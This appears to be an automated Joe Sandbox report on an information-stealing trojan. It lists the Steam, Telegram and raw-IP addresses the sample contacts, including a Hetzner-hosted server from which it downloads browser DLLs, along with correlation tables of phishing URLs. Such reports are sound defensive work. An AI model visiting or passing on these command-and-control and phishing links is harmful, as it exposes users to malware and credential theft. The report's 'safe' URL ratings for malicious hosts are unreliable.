                                                                                      https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://support.mic.BFRegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                        high
                                                                                        https://store.steampowered.com/points/shop/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                          high
                                                                                          https://95.217.242.142/mozglue.dll;RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BGCBGCAF.1.drfalse
                                                                                            high
                                                                                            https://95.217.242.14217d99a9f0nt-Disposition:RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.drfalse
                                                                                              high
                                                                                              https://steamcommunity.com/profiles/76561199680449169/badgesRegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                high
                                                                                                https://www.ecosia.org/newtab/BGCBGCAF.1.drfalse
                                                                                                  high
                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199680449169[1].htm.1.drfalse
                                                                                                    high
                                                                                                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                      high
                                                                                                      https://support.office.cRegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                        high
                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                          high
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                            high
                                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                              high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGIJDAFBK.1.drfalse
                                                                                                                high
                                                                                                                https://95.217.242.142/msvcp140.dllyRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                  high
                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/about/76561199680449169[1].htm.1.drfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                        high
                                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                              high
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BGCBGCAF.1.drfalse
                                                                                                                                high
                                                                                                                                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119968044916976561199680449169[1].htm.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://t.me/r1g1ofile.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGIJDAFBK.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBGCBGCAF.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://95.217.242.142/freebl3.dll7RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://steamcommunity.com/workshop/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/legal/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.sqlite.org/copyright.html.RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://95.217.242.142/vcruntime140.dllpRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199680449169[1].htm.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBGCBGCAF.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/76561199680449169[1].htm.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/profiles/76561199680449169/inventory/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=BGCBGCAF.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://95.217.242.142/softokn3.dlliRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      23.210.138.105
                                                                                                                                                                                      steamcommunity.comUnited States
                                                                                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                                                                                      95.217.242.142
                                                                                                                                                                                      unknownGermany
                                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                      142.250.191.164
                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      142.250.191.196
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      192.168.2.4
                                                                                                                                                                                      192.168.2.6
                                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                      Analysis ID:1433685
                                                                                                                                                                                      Start date and time:2024-04-29 22:12:08 +02:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 6m 12s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@30/23@5/7
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 95%
                                                                                                                                                                                      • Number of executed functions: 95
                                                                                                                                                                                      • Number of non-executed functions: 223
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.190.131, 142.251.182.84, 172.217.1.110, 34.104.35.123, 23.54.78.14, 192.229.211.108, 142.250.123.94, 142.250.190.78
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • VT rate limit hit for: file.exe
                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      22:13:05API Interceptor1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      239.255.255.250https://uaqtu.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            https://app.frame.io/presentations/2d6579dc-f1e9-4865-95d5-958bb921558d?component_clicked=digest_call_to_action&email_id=804d14dd-a622-4386-a24d-ac8b94986f46&email_type=pending-reviewer-inviteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              https://sheyla4nish.uk/wq.PDFGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                https://public-usa.mkt.dynamics.com/api/orgs/5c8c0184-a605-ef11-9f85-6045bd00390f/r/j0QY9SVMHE2ykWUnkq7W4wAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fisaustralia.com.au%252Fdoc%252Findex.php%253Fmail%253D%2520ryan_scott%2540office.com%2526paths%253Dabove%2526link%253DFax_Outlook%22%2C%22RedirectOptions%22%3A%7B%221%22%3Anull%7D%7D&digest=0BTPcenE%2BSe3bCywe6VBjbwnefP6rRpeXY%2FFBeN4nTE%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                  https://berkeley-dot-yamm-track.appspot.com/Redirect?ukey=1TvyROQ89ROqfi44tqqbET_9nenqwY_rGhHnpSU0ioI8-1646603876&key=YAMMID-60639156&link=https://jrx-tele.com/14b1bb/auth/sf_rand_mixed(8)/chamilton@hilcorp.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                    baddoge.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      rQLM0008233RFSOBL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        http://docxservice176233065.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          23.210.138.105file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                              https://www.steam.workshopslist.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 104.105.90.131
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 104.108.99.20
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 104.108.99.20
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 104.102.129.112
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 23.194.234.100
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 23.194.234.100
                                                                                                                                                                                                                    lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                                    • 96.17.209.196
                                                                                                                                                                                                                    n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                                                                                                                    • 96.17.209.196
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    AKAMAI-ASUShttps://sheyla4nish.uk/wq.PDFGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.192.220.19
                                                                                                                                                                                                                    EXTERNAL Compliance Training.msgGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.220.206.69
                                                                                                                                                                                                                    https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:94684c90-991c-41dd-8ac6-aa0438f76723Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.220.246.154
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                                    screenshot _2023-12_86-38-891-25983e9eee39a84a1tabb3b9.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.220.206.37
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                                    PXL_20240426_184121447.mp4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.54.41.214
                                                                                                                                                                                                                    https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImhiQGJ1eXNzZW5zLWxhdy5iZSIsInJlcXVlc3RJZCI6Ijc5Mjc0MTMyLTBmNTYtNDY4Ni01NTE3LTAzODgxOWFiYTM4OCIsImxpbmsiOiJodHRwczovL2Fjcm9iYXQuYWRvYmUuY29tL2lkL3VybjphYWlkOnNjOkVVOmY0Yzk4MzIzLTdlMGUtNGUxMS1iZjA4LWMyNzhhZDc4OGEyZSIsImxhYmVsIjoiMTEiLCJsb2NhbGUiOiJkZV9ERSJ9.ugOJeKtQ8XVlkMZy3LJ7ef7OsHDizntrzEbbkchy-mLoKu0o-XppcCUdn65Zt36NHfljbtp610mpWTLrYATOQwGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.220.246.154
                                                                                                                                                                                                                    Signature requested on jennifer.white OCF-3 Response Letter - Unsigned.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.220.246.154
                                                                                                                                                                                                                    Review_and_sign_today CFA_Agreements0001.14.pdf..msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.220.246.154
                                                                                                                                                                                                                    HETZNER-ASDESySyUs3O0a.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                    • 136.243.151.123
                                                                                                                                                                                                                    Inquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • 94.130.217.179
                                                                                                                                                                                                                    00000351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 135.181.124.14
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 95.217.245.42
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 95.217.245.42
                                                                                                                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                    • 116.203.164.244
                                                                                                                                                                                                                    31jvjGbPV0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 176.9.63.49
                                                                                                                                                                                                                    31jvjGbPV0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 176.9.63.49
                                                                                                                                                                                                                    https://loowes.shop/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 148.251.91.91
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    • 95.217.246.168
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4https://uaqtu.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    https://app.frame.io/presentations/2d6579dc-f1e9-4865-95d5-958bb921558d?component_clicked=digest_call_to_action&email_id=804d14dd-a622-4386-a24d-ac8b94986f46&email_type=pending-reviewer-inviteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    https://berkeley-dot-yamm-track.appspot.com/Redirect?ukey=1TvyROQ89ROqfi44tqqbET_9nenqwY_rGhHnpSU0ioI8-1646603876&key=YAMMID-60639156&link=https://jrx-tele.com/14b1bb/auth/sf_rand_mixed(8)/chamilton@hilcorp.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    rQLM0008233RFSOBL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    http://docxservice176233065.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    https://bit.ly/3wbA39YGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
                                                                                                                                                                                                                    https://m.exactag.com/ai.aspx?tc=d9496601bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ablessedbeyondproperties.com%2Fwinner%2F71809%2F%2Fam9lbC5zZWFybGVAemJldGEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 23.6.204.109
                                                                                                                                                                                                                    • 40.127.169.103
